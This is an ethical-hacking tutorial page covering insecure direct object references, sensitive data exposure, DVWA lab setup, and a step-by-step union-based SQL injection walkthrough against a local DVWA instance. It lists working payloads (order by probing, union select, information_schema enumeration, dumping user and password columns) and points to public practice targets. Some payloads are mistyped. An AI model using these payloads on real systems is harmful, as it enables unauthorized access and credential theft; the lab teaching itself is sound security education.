SQL Injection Attack in Web Applications : In  this  cyberpointsolution tutorial we are going to describe about the SQL Injection Attack in Web Applications.

SESSION 10

==========

================================

1. GET – It is the method used by web applications which is unsecure and show all the transmitting data from the web application UI to its Database or server. Requests data from a specified resource.

eg. php?id=1, ?cat=54, ?test=query.

2. POST – The method which hides and requests the data from the Database or Server Secretly. eg. twitter.com/login.php

———————————————————-

================================

A direct object reference occurs when a developer exposes a reference to an internal implementation object such as a file, directory or a database key. Without an access control check or other protection, Attackers can directly access the unsecured files and configurations and settings which are neither authorized nor validated by the administrator.

For eg. :

CHJM Website :

Accessing into another user –

www.chjm.org/login/…/php?id=1411 (ALEX)

www.chjm.org/login/../php?id=1411     ( entered into Logan’s Account)

Accessing into pages which are not authorized to a basic user-

www.chjm.org/user/../settings/config.html

www.chjm.org/login/../php?id=logan/settings/config.html

EG : arvindsharma.com > Login

arvindsharma.com/account/login.php

arvindsharma.com/account/user.php?id=1337

URL > arvindsharma.com

/account/ > fOLDER

user.php > Code

1337 > Sanjeev Multani

Kshitij > 1111 > 1337 > Sanjeev’s account

———————————————————-

=======================

Many web applications do not properly protect sensitive data such as Names, IDs, Credit Cards details, authentication credentials etc. Attackers may steal or modify such weakly protected data to conduct credit card fraud, identity theft or any other crimes. These Sensitive Data is well aspected to encryption also in which if the data is not encrypted and is in plain text, it will be very easier to get fetched by the attacker or any other individual.

=======================

1. Personal – Names, Address , Contact Numbers etc.

2. Confidential – ID,Passwords – Credentials, Aadhar No.

3. Financial – Bank Accounts numbers, credit cards, debity cards etc.

4. Health Information – Policies etc.

Demonstration on LVS.

———————————————————-

DVWA SETUP AND CONFIGURATION

============================

DVWA stands for Damn Vulnerable Web Application, it is PHP  MySQL based Web Application which is a organisational based understanding Web Application Attacks for OWASP TOP 10 like LVS.

STEPS

=====

Copy zip file into C:\xampp\htdocs

Right click the zip file, click on extract here

start xampp server, start apache and mysql

Go to the directory of dvwa in “htdocs”, navigate to the folder config, open the config.php file and make password=””(empty).

Open the browser, goto 127.0.0.1/dvwa

It will show you a message “Click here to create the Database”.

After Clicking, your Database have been created in “127.00.0.1/phpmyadmin” which will lists out all the Databases.

Go through the Instruction Page of LVS and then start learning through it.

———————————————————-

=====================

=========================

UNION BASED SQLI is a type of attack in which a attacker inputs some kind of malicious sql queries in the input method of the web application, and it get affected on the database resiulting out by extracting the “juicy” data.

DATABASE > TABLES > COLUMNS > ROWS

–+ : FOR ANY COMMAND I ENTER INTO THE INPUT METHOD, I HAVE TO ENTER –+ AFTER THAT TO MAKE IT A SQL QUERY.

# :

information schema

database()

version()

table_name – Table ka naam

column_name – Column ka naam

Information ki maa

=============

1. Information Schema : It has all of the data regarding every databases, tables, columns and every other detail of a Database. It is considered as the mother of Informations in Database.

2. –+ : Everything written with –+ would be acted like a SQL QUERY.

3. # : Everything entered after # will not be considered.

4. database() – name of the database

5. version() – version of the database.

Target – http://127.0.0.1/dvwa/vulnerabilities/sqli/

STEPS –  For SQLi always recommend to use Firefox, as special symbols and spaces does not get converted into URL encode

======

Step 1: To find the GET Method/Parameter

   eg.      php?id=1

            ?cat=24

            ?test=query

Trying to click each and every possible link or will give inputs to the search boxes of GET Method.

            “http://127.0.0.1/dv18/vulnerabilities/sqli/?id=1&Submit=Submit#”

Step 2: Check if my site is Vulnerable or not to Union Based SQLI

            ?id=1′

            php?id=1′

If we get an error that means my website is vulnerable to Union Based SQLI.

It will give – “http://127.0.0.1/dv18/vulnerabilities/sqli/?id=1′ &Submit=Submit#

You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ”1”’ at line 1 “

Step 3: To check the number of columns present in the database

            order by 100–+

            order by 200–+

            order by 300–+

  Until we get an error of “Unknown Order Clause”.

Eg.    127.0.0.1/dv18/vulnerabilities/sqli/?id=1′ order by 1–+&Submit=Submit#

          127.0.0.1/dv18/vulnerabilities/sqli/?id=1′ order by 2–+&Submit=Submit#

          127.0.0.1/dv18/vulnerabilities/sqli/?id=1′ order by 3–+&Submit=Submit#

Unknown column ‘3’ in ‘order clause’

Step 4: To Union Select the columns which are present in the Database and is Vulnerable

            union select 1,2–+

http://127.0.0.1/dv18/vulnerabilities/sqli/?id=1′ union select 1,2–+ &Submit=Submit#

Step 5: Extracting Information from Database

        – database()

        – version()

– union select version(),2–+

– union select 1,version()–+

        – union select all 1,version()–+  : 10.1.25-MariaDB

        – union select all 1,database()–+ :  dvwa

Step 6: Calling the Mother of Database – information_schema

= Extracting Table Names

– union select all 1,table_names from information_schema.tables–+

http://127.0.0.1/dv18/vulnerabilities/sqli/?id=1′ union select all 1,table_name from information_schema.tables–+&Submit=Submit#

= After Selecting a Juicy Table, Extracting data of that table :

– column_name, information_schema.columns

– union select all 1, columns_name from information_schema.columns where table_name=”users”–+

= To get the data from columns (user, password)

– union select user,password from users–+

    – http://127.0.0.1/dv18/vulnerabilities/sqli/?id=1′ group_concat(user,0x0a,password),2 from users–+

And we will get the Juicy Data.

——————————————————————————-

================

1. http://demo.testfire.net/

2. http://testphp.vulnweb.com/

---

Follow Us On Cyber Point Solution Youtube Channel : Click Here

Follow Us on Social Platforms to get Updated : twiter,  facebook, Google Plus

Learn More Ethical Hacking and Cyber Security click on this link. cyber security